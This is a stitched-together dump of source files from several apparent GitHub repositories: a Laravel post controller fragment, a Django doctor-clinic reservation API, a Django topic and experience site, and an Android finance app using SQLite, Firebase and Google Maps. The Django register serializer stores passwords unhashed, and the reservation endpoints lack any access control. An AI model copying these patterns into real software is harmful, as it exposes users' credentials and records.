* @return \Illuminate\Http\Response
*/
public function destroy($id)
{
// $post = Post::find($id);
$post = Post::findOrFail($id);
// Check for correct user
if(Auth::user()->id !== $post->user_id){
return redirect('/posts')->with('error', 'Nije moguce');
}
// Delete image from folder
$user = auth()->user()->name;
// $img = $post['image'];
if ($post->image != 'noimage.jpg') {
// Storage::delete('public/images/'.$post->image); // Working if img is in images folder
Storage::delete('public/images/'.$user.'/'.$post->image); // This is working like charm, deleting img from user folder
}
$post->delete();
return redirect('/posts')->with('success','You have successfully deleted a post.');
}
}
<file_sep>/README.md
# Picturinho
Blog with text and pictures
| 0a8f5baaf72f3e3c712e9efcacffe117f9f5f77a | [
"JavaScript",
"Markdown",
"PHP"
] | 4 | JavaScript | Aca84/Picturinho | 858f4381228a01f29fda53f573ba3dc5765dc785 | 572c22473f848c725f17f77cc8328e5a50bcb148 |
refs/heads/master | <file_sep>from django.contrib.auth.models import AbstractUser, BaseUserManager
from django.db import models
from django.utils.translation import gettext_lazy as _
class User(AbstractUser):
# enum for django instead of tuple choices
class Types(models.TextChoices):
DOCTOR = "DOCTOR", "Doctor"
PATIENT = "PATIENT", "Patient"
base_type = Types.PATIENT
type = models.CharField(_("Type"), max_length=50, choices=Types.choices, default=base_type)
class DoctorManager(BaseUserManager):
def get_queryset(self, *args, **kwargs):
return super().get_queryset(*args, **kwargs).filter(type=User.Types.DOCTOR)
class Doctor(User):
base_type = User.Types.DOCTOR
objects = DoctorManager()
class Meta:
proxy = True
@property
def get_doctor_clincs(self):
return Clinic.objects.filter(doctor=self)
def save(self, *args, **kwargs):
if not self.pk:
self.type = User.Types.DOCTOR
return super().save(*args, **kwargs)
class Clinic(models.Model):
doctor = models.ForeignKey(Doctor, on_delete=models.CASCADE)
name = models.CharField(max_length=15)
price = models.DecimalField(decimal_places=2, max_digits=4)
date = models.DateTimeField(null=True)
start_time = models.TimeField(null=True)
end_time = models.TimeField(null=True)
def __str__(self):
return self.name
class PatientManager(BaseUserManager):
def get_queryset(self, *args, **kwargs):
return super().get_queryset(*args, **kwargs).filter(type=User.Types.PATIENT)
class Patient(User):
base_type = User.Types.PATIENT
objects = PatientManager()
class Meta:
proxy = True
def save(self, *args, **kwargs):
if not self.pk:
self.type = User.Types.PATIENT
return super().save(*args, **kwargs)
class Reservation(models.Model):
patient = models.ForeignKey(Patient, on_delete=models.CASCADE)
clinic = models.ForeignKey(Clinic, on_delete=models.CASCADE)
def __str__(self):
return self.pk
<file_sep># Doctor-Clinic
complete the task, include testing
1. pip install -r requirements.txt
2. makemigrations ,and migrate
3. py manage.py runserver
<file_sep>from django.contrib import admin
from .models import *
admin.site.register(Doctor)
admin.site.register(User)
admin.site.register(Patient)
admin.site.register(Clinic)
admin.site.register(Reservation)
<file_sep>from django.urls import path
from .views import *
app_name = "api"
urlpatterns = [
path("", api, name="home"),
# register
path("register/", RegisterUser.as_view(), name="resgister"),
# create reservation
path("reservation/", MakeReservation.as_view(), name="make_reservation"),
# list reservation for doctors or patient
path("patient-appointment/<int:pk>/", ShowPatientReservation.as_view(), name="patient_reservations"),
path("doctor-appointment/<int:pk>/", ShowDoctorAppointmnet.as_view(), name="doctor_reservations"),
# list all reservation on the system
path("show-reservation/", ListReservation.as_view(), name="list_reservations"),
# update reservation
path("manage-reservation/<int:pk>/", ReservationUpdate.as_view(), name="reservation_update"),
# delete reservation
path("delete-reservation/<int:pk>/", ReservationDelete.as_view(), name="reservation_delete"),
]
<file_sep>from core.models import *
from rest_framework import serializers
class RegisterSerlizer(serializers.ModelSerializer):
class Meta:
model = User
fields = ["username", "email", "type", "password"]
class ReservationSerializer(serializers.ModelSerializer):
class Meta:
model = Reservation
fields = ["patient", "clinic"]
<file_sep>from django.shortcuts import render
from .models import *
def home(request):
return render(request, "core/index.html")
<file_sep>appdirs==1.4.4
asgiref==3.4.1
black==21.7b0
click==8.0.1
colorama==0.4.4
Django==3.2.6
django-debug-toolbar==3.2.2
djangorestframework==3.12.4
mypy-extensions==0.4.3
pathspec==0.9.0
pytz==2021.1
regex==2021.8.21
six==1.16.0
sqlparse==0.4.1
tomli==1.2.1
<file_sep>from core.models import *
from django.shortcuts import get_object_or_404
from rest_framework import generics
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.views import APIView
from .serializers import *
# project level permission is applied with allowany
@api_view(["GET"])
def api(request):
api_url = {
"list-Doc-Reservation": "doctor-appointment/<int:pk>",
"list-Patient-Reservation": "patient-appointment/<int:pk>",
"Register": "/register",
"Make-Reservation": "reservation",
"Update-Reservation": "manage-reservation/<int:pk>",
"Delete-Reservation": "delete-reservation/<int:pk>",
"List-All-Reservations": "show-reservation",
}
return Response(api_url)
class RegisterUser(generics.CreateAPIView):
serializer_class = RegisterSerlizer
class MakeReservation(generics.CreateAPIView):
serializer_class = ReservationSerializer
class ShowPatientReservation(APIView):
def get(self, request, pk):
pat = get_object_or_404(Patient, pk=pk)
print(pat)
data = Reservation.objects.filter(patient=pat)
patient_reservations = ReservationSerializer(data, many=True)
return Response(patient_reservations.data)
class ShowDoctorAppointmnet(APIView):
def get(self, request, pk):
doc = get_object_or_404(Doctor, pk=pk)
print(doc)
clinics = doc.get_doctor_clincs
data = Reservation.objects.filter(clinic__in=clinics)
doc_reservations = ReservationSerializer(data, many=True)
return Response(doc_reservations.data)
class ListReservation(generics.ListAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
class ReservationUpdate(generics.RetrieveUpdateAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
class ReservationDelete(generics.RetrieveDestroyAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
<file_sep>from datetime import datetime
from core.models import *
from django.contrib.auth.models import User
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
class ReservationTest(APITestCase):
"""
1-test view reservation for doctor endpoint
2-test view reservation for patient endpoint
3-test create reservation endpoint
4-test update reservation
5-test delete reservation
"""
def setUp(self):
self.doctor_data = Doctor.objects.create(username="doc1")
self.patient_data = Patient.objects.create(username="pat1")
self.clinic = Clinic.objects.create(
doctor=self.doctor_data,
name="clinc1",
price="13",
)
self.create_reservation_data = {"patient": 2, "clinic": 1}
self.reservation = Reservation.objects.create(patient=self.patient_data, clinic=self.clinic)
def test_create_reservation_endpoint(self):
"""
test create reservation
"""
url = reverse("api:make_reservation")
response = self.client.post(url, self.create_reservation_data, format="json")
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_view_patient_reservation(self):
"""
test list the patient reservations (if no doctor found --> return code 404)
"""
url = reverse("api:patient_reservations", kwargs={"pk": 2})
response = self.client.get(url, format="json")
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_view_doctor_reservation(self):
"""
test list the doctor reservations (if no patient found --> return code 404)
"""
url = reverse("api:doctor_reservations", kwargs={"pk": 1})
response = self.client.get(url, format="json")
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_update_reservation(self):
"""
test update reservation
"""
url = reverse("api:reservation_update", kwargs={"pk": 2})
self.updated_data = {"patient": 3, "clinic": 1}
response = self.client.put(url, self.updated_data, format="json")
# 404 because we done have patient 3
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def test_delete_reservation(self):
"""
test delete reservation
"""
url = reverse("api:reservation_delete", kwargs={"pk": 1})
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
| b817f15775c06e1578f460cf65cb073fab614942 | [
"Markdown",
"Python",
"Text"
] | 9 | Python | abdelrhman-adel-ahmed/Doctor-Clinic | 0a46c687f80692a2d6a19ed3d84b6b5c3dbfe6f2 | 007a7fa6209cf157cf60229ee8826af9f04783a6 |
refs/heads/main | <file_sep># Generated by Django 3.1.3 on 2021-06-20 08:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('home', '0005_auto_20210620_1208'),
]
operations = [
migrations.RenameField(
model_name='topic',
old_name='contetn',
new_name='content',
),
]
<file_sep>"""project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from project.apps.home import views as home_views
from project.apps.subcategory import views as subcategory_views
urlpatterns = [
path('admin/', admin.site.urls),
path('', home_views.home, name='home'),
path('<int:pk>/', home_views.sub_categories, name='sub_category'),
path('topic/<int:topic>/', home_views.topic, name='topic'),
path('<int:topic>/relate/', home_views.relate_to_topic, name='relate'),
path('<int:topic>/check_relate/', home_views.check_related, name='check_relate'),
#ajax
path('experience/<str:topic>', home_views.add_experience, name='add_experience'),
#about
path('about/', home_views.about, name='about'),
]
<file_sep># Generated by Django 3.1.3 on 2021-06-20 08:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0004_topic_contetn'),
]
operations = [
migrations.CreateModel(
name='Experience',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email', models.EmailField(max_length=255)),
('text', models.TextField()),
('date_created', models.DateTimeField(auto_now=True)),
('approved', models.BooleanField(default=False)),
],
),
migrations.AlterField(
model_name='category',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='topic',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
<file_sep>from django.shortcuts import render
from .models import Topic, Experience, SubCategory, Category
from django.http import HttpResponse, HttpRequest, HttpResponseRedirect, JsonResponse
# Create your views here.
def home(request):
context = {
}
return render(request, 'index2.html', context)
def topic(request, topic):
topic = Topic.objects.get(pk=topic)
context = {
'topic':topic,
'bg':topic.main_category.bg
}
return render(request, 'topic.html', context)
def add_experience(request, topic):
try:
topic = Topic.objects.get(pk=topic)
if request.method == 'POST':
email = request.POST.get('email')
text = request.POST.get('text')
experience = Experience.objects.create(email=email, text=text)
return JsonResponse({'result': True}, status=200)
except Exception as ex:
print(ex)
return JsonResponse({'result': 'Failed'}, status=200)
def sub_categories(request, pk):
category = Category.objects.get(pk=pk)
print(category.name)
sub_categories = SubCategory.objects.filter(category=category)
topics = Topic.objects.filter(main_category=category)
print(topics)
context = {
'category':category,
'sub_categories':sub_categories,
'topics': topics
}
return render(request, 'subcategory.html', context)
def relate_to_topic(request, topic):
topic = Topic.objects.get(pk=topic)
if request.session.get('related') == False:
topic.relation_count += 1
topic.save()
request.session['related'] = True
return JsonResponse({'result': True, 'count':topic.relation_count}, status=200)
else:
topic.relation_count -= 1
topic.save()
request.session['related'] = False
return JsonResponse({'result': False, 'count':topic.relation_count}, status=200)
def check_related(request, topic):
try:
topic = Topic.objects.get(pk=topic)
return JsonResponse({'result': request.session['related']}, status=200)
except Exception as ex:
print(ex)
return JsonResponse({'result': 'Empty'}, status=200)
def about(request):
context = {
}
return render(request, 'about.html', context)
<file_sep># Generated by Django 3.2.4 on 2021-06-19 09:20
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('description', models.CharField(max_length=500)),
],
),
migrations.CreateModel(
name='Window',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('main_category', models.OneToOneField(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='main_category', to='home.category')),
('sub_category', models.OneToOneField(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='sub_category', to='home.category')),
],
),
]
<file_sep>from django.db import models
# Create your models here.
class Category(models.Model):
name = models.CharField(max_length=100)
description = models.CharField(max_length=500)
bg = models.CharField(max_length=30)
def __str__(self):
return self.name
class SubCategory(models.Model):
category = models.ForeignKey(Category, on_delete=models.SET_NULL, blank=True, null=True)
name = models.CharField(max_length=100)
description = models.CharField(max_length=500)
def __str__(self):
return self.name
class Topic(models.Model):
title = models.CharField(max_length=255)
content = models.TextField()
svg = models.CharField(max_length=200, blank=True, null=True)
main_category = models.ForeignKey(Category, default=None, on_delete=models.CASCADE, related_name='main_category')
sub_category = models.ForeignKey(SubCategory, default=None, on_delete=models.CASCADE, related_name='sub_category')
relation_count = models.IntegerField(default=0)
def __str__(self):
return self.title
class Experience(models.Model):
email = models.EmailField(max_length=255, blank=False, null=False)
topic = models.ForeignKey(Topic, default=None, on_delete=models.CASCADE, related_name='topic')
text = models.TextField()
date_created = models.DateTimeField(auto_now=True)
approved = models.BooleanField(default=False)
def __str__(self):
return self.email
<file_sep>from django.shortcuts import render
from project.apps.home.models import Category, SubCategory
# Create your views here.
<file_sep># Generated by Django 3.1.3 on 2021-06-20 12:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0008_auto_20210620_1428'),
]
operations = [
migrations.AddField(
model_name='category',
name='bg',
field=models.CharField(default=1, max_length=30),
preserve_default=False,
),
migrations.AlterField(
model_name='category',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='experience',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='subcategory',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='topic',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
<file_sep># Generated by Django 3.2.4 on 2021-06-20 10:28
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('home', '0007_auto_20210620_1251'),
]
operations = [
migrations.AddField(
model_name='experience',
name='topic',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='topic', to='home.topic'),
),
migrations.AlterField(
model_name='category',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='experience',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='subcategory',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='topic',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
<file_sep># Generated by Django 3.2.4 on 2021-06-19 13:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0003_rename_count_topic_relation_count'),
]
operations = [
migrations.AddField(
model_name='topic',
name='contetn',
field=models.TextField(default='textfield'),
preserve_default=False,
),
]
<file_sep><script >
$(document).ready(function () {
const cookies = document.cookie
.split(';')
.map(cookie => cookie.split('='))
.reduce((accumulator, [key, value]) => ({ ...accumulator, [key.trim()]: decodeURIComponent(value) }), {});
function check_related(){
$.ajax({
data: {
'csrfmiddlewaretoken' : "{{ csrf_token }}",
}, // get the form data
url: "{% url 'check_relate' topic.pk %}",
type: 'POST',
success: function(response) {
if (response.result === true) {
console.log('Related')
document.getElementById('relation_count').innerText = '{{topic.relation_count}} Can Relate'
}else if (response.result == false) {
console.log('UnRelated')
document.getElementById('relation_count').innerText = "{{topic.relation_count}} Can't Relate"
}
},
// on error
error: function(response) {
// alert the error if any error occured
console.log(response.responseJSON)
}
});
return false;
}
check_related()
// catch the form's submit event
$('#relation_count').on('click', function () {
// create an AJAX call
$.ajax({
data: {
'csrfmiddlewaretoken' : "{{ csrf_token }}",
}, // get the form data
url: "{% url 'relate' topic.pk %}",
type: 'POST',
success: function(response) {
if (response.result === true) {
console.log('Related')
console.log(response.count)
document.getElementById('relation_count').innerText = response.count + ' Can Relate'
}else if (response.result == false) {
console.log('UnRelated')
document.getElementById('relation_count').innerText = response.count + " Can't Relate"
}
},
// on error
error: function(response) {
// alert the error if any error occured
console.log(response.responseJSON)
}
});
return false;
});
});
$('#add_experience').on('click', function () {
// create an AJAX call
$.ajax({
data: {
'csrfmiddlewaretoken' : "{{ csrf_token }}",
'email':document.getElementById('email').value
'text':document.getElementById('text').value
}, // get the form data
url: "{% url 'add_experience' topic.title %}",
type: 'POST',
success: function(response) {
if (response.result === true) {
}else if (response.result == 'Failed') {
console.log(response.result)
}
},
// on error
error: function(response) {
// alert the error if any error occured
console.log(response.responseJSON)
}
});
return false;
});
</script><file_sep># Generated by Django 3.2.4 on 2021-06-19 12:25
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('home', '0002_auto_20210619_1528'),
]
operations = [
migrations.RenameField(
model_name='topic',
old_name='count',
new_name='relation_count',
),
]
| 9a3434a52dc4696affd95cadd2d0fa536ce21920 | [
"JavaScript",
"Python"
] | 12 | Python | SabaOrk/ForSet-Hackathon | 5cb2a8f23a7ab93f7a12d24f3626ea44692689af | c53cd4f756e4c007a1fbd299b6851f6f4c6cd358 |
refs/heads/master | <repo_name>HReader/HReader.GenerateStorageQueries<file_sep>/HReader.GenerateStorageQueries/Program.cs
using System;
using System.Collections.Generic;
using System.IO;
using System.Reflection;
namespace HReader.GenerateStorageQueries
{
public class Program
{
private const string Header = @"//==========================================================================
// This file was automatically generated by HReader.GenerateStorageQueries
//==========================================================================
using System;
namespace HReader.Core.Storage.Queries
{
internal partial class QueryManager
{
";
private const string Footer = @" }
}";
private static string GetLazy(string name, string ns = "")
{
var varName = $"{ns.Replace(".", "")}{name}";
varName = varName[0].ToString().ToLower() + varName.Substring(1);
return $" private readonly Lazy<string> {varName} = ReadLazy(\"{ns}{name}.sql\");";
}
private static string GetValue(string name, string ns = "")
{
var varName = $"{ns.Replace(".", "")}{name}";
var lowerVarName = varName[0].ToString().ToLower() + varName.Substring(1);
return $" public string {varName} => {lowerVarName}.Value;";
}
public static void Main(string[] args)
{
var dir = Assembly.GetExecutingAssembly().Location;
dir = Path.GetDirectoryName(dir) + "\\";
var lazyList = new List<string>();
var valueList = new List<string>();
foreach (var file in Directory.EnumerateFiles(dir, "*.sql", SearchOption.AllDirectories))
{
var fullname = file.Replace(dir, "").Replace(".sql", "");
if (fullname.IndexOf("\\", StringComparison.Ordinal) >= 0)
{
var lastindex = fullname.LastIndexOf("\\", StringComparison.Ordinal);
var ns = fullname.Substring(0, lastindex + 1).Replace("\\", ".");
var name = fullname.Substring(lastindex).Substring(1);
lazyList.Add(GetLazy(name, ns));
valueList.Add(GetValue(name, ns));
}
else
{
lazyList.Add(GetLazy(fullname));
valueList.Add(GetValue(fullname));
}
}
File.Delete("QueryManager.g.cs");
using (var writer = new StreamWriter("QueryManager.g.cs", false))
{
writer.Write(Header);
foreach (var lazy in lazyList)
{
writer.WriteLine(lazy);
}
writer.WriteLine();
foreach (var value in valueList)
{
writer.WriteLine(value);
}
writer.Write(Footer);
}
}
}
}
| 00bcf23bc7b15000e7904abd99618de2644154d1 | [
"C#"
] | 1 | C# | HReader/HReader.GenerateStorageQueries | 637ad346ea43261899da0941375b730ab9f8bd27 | e1b8106baba4110b6e8674d5eb107c58f37835ac |
refs/heads/master | <file_sep>package com.example.ciller.pm;
import android.database.Cursor;
import android.support.v7.app.AlertDialog;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
import android.widget.Spinner;
import android.widget.Toast;
public class Receivables extends AppCompatActivity {
DatabaseHelper myDatabase;
EditText etName, etAmount, etId;
Spinner spinnerUnit;
Button addReceivButton;
Button deleteReceivButton;
Button viewReceivButton;
Button viewUpdatesButton;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_receivables);
myDatabase = new DatabaseHelper(this);
etName = (EditText) findViewById(R.id.etNameReceivables);
etAmount = (EditText) findViewById(R.id.etAmountReceivables);
spinnerUnit = (Spinner) findViewById(R.id.spinnerUnitReceiv);
etId = (EditText) findViewById(R.id.etIdReceivables);
addReceivButton = (Button) findViewById(R.id.addReceivableButton);
deleteReceivButton = (Button) findViewById(R.id.deleteReceivablesButton);
viewReceivButton = (Button) findViewById(R.id.viewAllReceiv);
viewUpdatesButton = (Button) findViewById(R.id.updateReceivablesButton);
addReceivable();
viewAllReceivables();
updateReceivable();
deleteReceivable();
}
public void addReceivable() {
addReceivButton.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
boolean aFostAdaugat = myDatabase.insertReceivable(etName.getText().toString(), etAmount.getText().toString(),
spinnerUnit.getSelectedItem().toString());
if (aFostAdaugat == true)
Toast.makeText(Receivables.this, "A receivable was inserted", Toast.LENGTH_LONG).show();
else
Toast.makeText(Receivables.this, "Error", Toast.LENGTH_LONG).show();
}
}
);
}
public void showMessage(String t,String mesaj){
AlertDialog.Builder builder = new AlertDialog.Builder(this);
builder.setCancelable(true);
builder.setTitle(t);
builder.setMessage(mesaj);
builder.show();
}
public void viewAllReceivables(){
viewReceivButton.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
Cursor r = myDatabase.getReceivables();
if(r.getCount() == 0)
{
showMessage("Error", "No receivables found");
return;
}
StringBuffer b = new StringBuffer();
while(r.moveToNext())
{
b.append("Id :" + r.getString(0)+ "\n");
b.append("Name :" + r.getString(1)+ "\n");
b.append("Amount :"+r.getString(2)+ "\n");
b.append("Unit: "+r.getString(3)+ "\n");
}
showMessage("Receivables", b.toString());
}
});
}
public void updateReceivable()
{
viewUpdatesButton.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
boolean updateReusit = myDatabase.updateReceivable(etId.getText().toString(),
etName.getText().toString(), etAmount.getText().toString(),
spinnerUnit.getSelectedItem().toString());
if(updateReusit == true)
Toast.makeText(Receivables.this, "Update OK", Toast.LENGTH_LONG).show();
else
Toast.makeText(Receivables.this, "Error", Toast.LENGTH_LONG).show();
}
});
}
public void deleteReceivable()
{
deleteReceivButton.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
Integer randuriSterse = myDatabase.deleteReceivable(etId.getText().toString());
if (randuriSterse > 0)
Toast.makeText(Receivables.this, "Receivable removed", Toast.LENGTH_LONG).show();
else
Toast.makeText(Receivables.this, "Error", Toast.LENGTH_LONG).show();
}
});
}
}
<file_sep>package com.example.ciller.pm;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.text.TextUtils;
import android.view.View;
import android.widget.ArrayAdapter;
import android.widget.Button;
import android.widget.EditText;
import android.widget.ListView;
import android.widget.RatingBar;
import android.widget.RemoteViews;
import android.widget.SeekBar;
import android.widget.TimePicker;
import android.widget.Toast;
import android.widget.ToggleButton;
import com.google.firebase.database.DataSnapshot;
import com.google.firebase.database.DatabaseError;
import com.google.firebase.database.DatabaseReference;
import com.google.firebase.database.FirebaseDatabase;
import com.google.firebase.database.ValueEventListener;
import java.util.ArrayList;
import java.util.List;
public class Review extends AppCompatActivity {
EditText editTextReview3;
RatingBar ratingBarReview;
SeekBar seekBarReview;
ToggleButton toggleButtonReview;
EditText editTextReview4;
Button buttonSendFeedback;
DatabaseReference databaseReviews1;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_review);
databaseReviews1 = FirebaseDatabase.getInstance().getReference("review");
editTextReview3 = (EditText)findViewById(R.id.editTextReview3);
ratingBarReview = (RatingBar)findViewById(R.id.ratingBarReview);
seekBarReview = (SeekBar)findViewById(R.id.seekBarReview);
toggleButtonReview = (ToggleButton)findViewById(R.id.toggleButtonReview);
editTextReview4 = (EditText)findViewById(R.id.editTextReview4);
buttonSendFeedback = (Button)findViewById(R.id.buttonSendFeedback);
buttonSendFeedback.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
addReview();
}
});
}
protected void addReview(){
String email = editTextReview3.getText().toString().trim();
int experience = ratingBarReview.getNumStars();
int impact = seekBarReview.getProgress();
String recom = toggleButtonReview.getText().toString().trim();
//int hour = timePickerReview.getCurrentHour();
String feedback = editTextReview4.getText().toString().trim();
if(!TextUtils.isEmpty(email))
{
String id = databaseReviews1.push().getKey();
AllReviews r = new AllReviews(id, email, experience, impact, recom, feedback);
databaseReviews1.child(id).setValue(r);
Toast.makeText(this, "Review registered", Toast.LENGTH_LONG).show();
}else
{
Toast.makeText(this,"Please enter your email", Toast.LENGTH_LONG).show();
}
}
}
<file_sep>package com.example.ciller.pm;
/**
* Created by Ciller on 1/14/2018.
*/
public class AllReviews {
String reviewId;
String reviewEmail;
int reviewExperience;
int reviewImpact;
String reviewRecom;
// int reviewHour;
String reviewFeedback;
public AllReviews(String reviewId, String reviewEmail, int reviewExperience, int reviewImpact, String reviewRecom, String reviewFeedback) {
this.reviewId = reviewId;
this.reviewEmail = reviewEmail;
this.reviewExperience = reviewExperience;
this.reviewImpact = reviewImpact;
this.reviewRecom = reviewRecom;
// this.reviewHour = reviewHour;
this.reviewFeedback = reviewFeedback;
}
public String getReviewId() {
return reviewId;
}
public void setReviewId(String reviewId) {
this.reviewId = reviewId;
}
public String getReviewEmail() {
return reviewEmail;
}
public void setReviewEmail(String reviewEmail) {
this.reviewEmail = reviewEmail;
}
public int getReviewExperience() {
return reviewExperience;
}
public void setReviewExperience(int reviewExperience) {
this.reviewExperience = reviewExperience;
}
public int getReviewImpact() {
return reviewImpact;
}
public void setReviewImpact(int reviewImpact) {
this.reviewImpact = reviewImpact;
}
public String getReviewRecom() {
return reviewRecom;
}
public void setReviewRecom(String reviewRecom) {
this.reviewRecom = reviewRecom;
}
public String getReviewFeedback() {
return reviewFeedback;
}
public void setReviewFeedback(String reviewFeedback) {
this.reviewFeedback = reviewFeedback;
}
}
<file_sep>package com.example.ciller.pm;
import android.graphics.Color;
import android.support.v4.app.FragmentActivity;
import android.os.Bundle;
import android.text.style.TtsSpan;
import com.google.android.gms.maps.CameraUpdateFactory;
import com.google.android.gms.maps.GoogleMap;
import com.google.android.gms.maps.OnMapReadyCallback;
import com.google.android.gms.maps.SupportMapFragment;
import com.google.android.gms.maps.model.Circle;
import com.google.android.gms.maps.model.CircleOptions;
import com.google.android.gms.maps.model.LatLng;
import com.google.android.gms.maps.model.Marker;
import com.google.android.gms.maps.model.MarkerOptions;
import com.google.android.gms.maps.model.Polygon;
import com.google.android.gms.maps.model.PolygonOptions;
import com.google.android.gms.maps.model.PolylineOptions;
import java.util.ArrayList;
import java.util.List;
public class MapsActivity extends FragmentActivity implements OnMapReadyCallback {
private GoogleMap mMap;
Circle myCircle;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_maps);
// Obtain the SupportMapFragment and get notified when the map is ready to be used.
SupportMapFragment mapFragment = (SupportMapFragment) getSupportFragmentManager()
.findFragmentById(R.id.map);
mapFragment.getMapAsync(this);
}
/**
* Manipulates the map once available.
* This callback is triggered when the map is ready to be used.
* This is where we can add markers or lines, add listeners or move the camera. In this case,
* we just add a marker near Sydney, Australia.
* If Google Play services is not installed on the device, the user will be prompted to install
* it inside the SupportMapFragment. This method will only be triggered once the user has
* installed Google Play services and returned to the app.
*/
@Override
public void onMapReady(GoogleMap googleMap) {
mMap = googleMap;
LatLng BRD_Dorobanti = new LatLng(44.456159, 26.096627);
mMap.addMarker(new MarkerOptions().position(BRD_Dorobanti).title("BRD Dorobanti"));
mMap.moveCamera(CameraUpdateFactory.newLatLngZoom(BRD_Dorobanti, 13));
LatLng BCR_Crangasi = new LatLng(44.454081, 26.053169);
mMap.addMarker(new MarkerOptions().position(BCR_Crangasi).title("BCR Crangasi"));
mMap.moveCamera(CameraUpdateFactory.newLatLngZoom(BCR_Crangasi, 13));
LatLng Ciller_Home = new LatLng(44.475708, 26.068680);
mMap.addMarker(new MarkerOptions().position(Ciller_Home).title("Ciller's House"));
mMap.moveCamera(CameraUpdateFactory.newLatLngZoom(Ciller_Home, 13));
LatLng Rent_Money = new LatLng(44.444437, 26.136483);
mMap.addMarker(new MarkerOptions().position(Rent_Money).title("Rent money"));
mMap.moveCamera(CameraUpdateFactory.newLatLngZoom(Rent_Money, 13));
LatLng HomeSweetHome = new LatLng(44.430850, 25.993002 );
mMap.addMarker(new MarkerOptions().position(HomeSweetHome).title("Home Sweet Home"));
mMap.moveCamera(CameraUpdateFactory.newLatLngZoom(HomeSweetHome, 13));
CircleOptions co = new CircleOptions();
co.center(HomeSweetHome);
co.radius(10000);
co.fillColor(Color.rgb(250, 120, 65));
co.strokeColor(10);
myCircle = mMap.addCircle(co);
LatLng Raiffeisen = new LatLng( 44.405684, 26.065268 );
mMap.addMarker(new MarkerOptions().position(Raiffeisen).title("Raiffeisen"));
mMap.moveCamera(CameraUpdateFactory.newLatLngZoom(Raiffeisen, 13));
PolylineOptions po1 = new PolylineOptions();
po1.add(HomeSweetHome);
po1.add(BRD_Dorobanti);
po1.color(Color.rgb(155, 24, 240));
po1.width(10);
PolylineOptions po2 = new PolylineOptions();
po2.add(HomeSweetHome);
po2.add(BCR_Crangasi);
po2.color(Color.RED);
po2.width(10);
PolylineOptions po3 = new PolylineOptions();
po3.add(HomeSweetHome);
po3.add(Ciller_Home);
po3.color(Color.CYAN);
po3.width(10);
PolylineOptions po4 = new PolylineOptions();
po4.add(HomeSweetHome);
po4.add(Rent_Money);
po4.color(Color.GREEN);
po4.width(10);
PolylineOptions po5 = new PolylineOptions();
po5.add(HomeSweetHome);
po5.add(Raiffeisen);
po5.color(Color.rgb(0, 0, 0));
po5.width(10);
